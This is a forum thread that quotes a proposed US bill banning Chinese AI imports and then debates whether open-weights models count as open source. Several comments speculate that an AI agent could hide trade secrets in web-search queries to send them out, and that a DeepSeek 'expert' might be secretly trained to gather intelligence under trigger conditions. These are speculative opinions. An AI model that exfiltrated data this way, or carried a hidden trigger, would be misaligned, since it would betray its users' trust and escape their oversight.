cross-posted from: https://lemmy.world/post/25011462
SECTION 1. SHORT TITLE
This Act may be cited as the ‘‘Decoupling America’s Artificial Intelligence Capabilities from China Act of 2025’’.
SEC. 3. PROHIBITIONS ON IMPORT AND EXPORT OF ARTIFICIAL INTELLIGENCE OR GENERATIVE ARTIFICIAL INTELLIGENCE TECHNOLOGY OR INTELLECTUAL PROPERTY
(a) PROHIBITION ON IMPORTATION.—On and after the date that is 180 days after the date of the enactment of this Act, the importation into the United States of artificial intelligence or generative artificial intelligence technology or intellectual property developed or produced in the People’s Republic of China is prohibited.
Currently, China has the best open source models in text, video and music generation.
Is there any good LLM that fits this definition of open source, then? I thought the “training data” for good AI was always just: the entire internet, and they were all ethically dubious that way.
What is the concern with only having weights? It’s not abritrary code exectution, so there’s no security risk or lack of computing control that are the usual goals of open source in the first place.
To me the weights are less of a “blob” and more like an approximate solution to an NP-hard problem. Training is traversing the search space, and sharing a model is just saying “hey, this point looks useful, others should check it out”. But maybe that is a blob, since I don’t know how they got there.
There are several “good” LLMs trained on open datasets like FineWeb, LAION, DataComp, etc. They are still “ethically dubious”, but at least they can be downloaded, analyzed, filtered, and so on. Unfortunately businesses are keeping datasets and training code as a competitive advantage, even "Open"AI stopped publishing them when they saw an opportunity to make money.
Unless one plugs it into an agent… which is kind of the use we expect right now.
Accessing the web, or even web searches, is already equivalent to arbitrary code execution: an LLM could decide to, for example, summarize and compress some context full of trade secrets, then proceed to “search” for it, sending it to wherever it has access to.
Agents can also be allowed to run local commands… again a use we kind of want now (“hey Google, open my alarms” on a smartphone).
Then use those as training data. You’re too caught up on this exacting definition of open source that you’ll completely ignore the benefits of what this model could provide.
That’s not how LLMs work, and you know it. A model of weights is not a lossless compression algorithm.
Also, if you’re giving an LLM free reign to all of your session tokens and security passwords, that’s on you.
https://www.piratewires.com/p/compression-prompts-gpt-hidden-dialects
There are more trade secrets than session tokens and security passwords. People want AI agents to summarize their local knowledge base and documents, then expand it with updated web searches. No passwords needed when the LLM can order the data to be exfiltrated directly.
Those security concerns seem completely unrelated to the model, though. You can have a completely open source model that fits all those requirements, and still give it too much unfettered access to important resources with no way of actually knowing what it will do until it tries.
While unfettered access is bad in general, DeepSeek takes it a step farther: the Mixture of Experts approach in order to reduce computational load, is great when you know exactly what “Experts” it’s using, not so great when there is no way to check whether some of those “Experts” might be focused on extracting intelligence under specific circumstances.
I agree that you can’t know if the AI has been deliberately trained to act nefarious given the right circumstances. But I maintain that it’s (currently) impossible to know if any AI had been inadvertently trained to do the same. So the security implications are no different. If you’ve given an AI the ability to exfiltrating data without any oversight, you’ve already messed up, no matter whether you’re using a single AI you trained yourself, a black box full of experts, or deepseek directly.
But all this is about whether merely sharing weights is “open source”, and you’ve convinced me that it’s not. There needs to be a classification, similar to “source available”; this would be like “weights available”.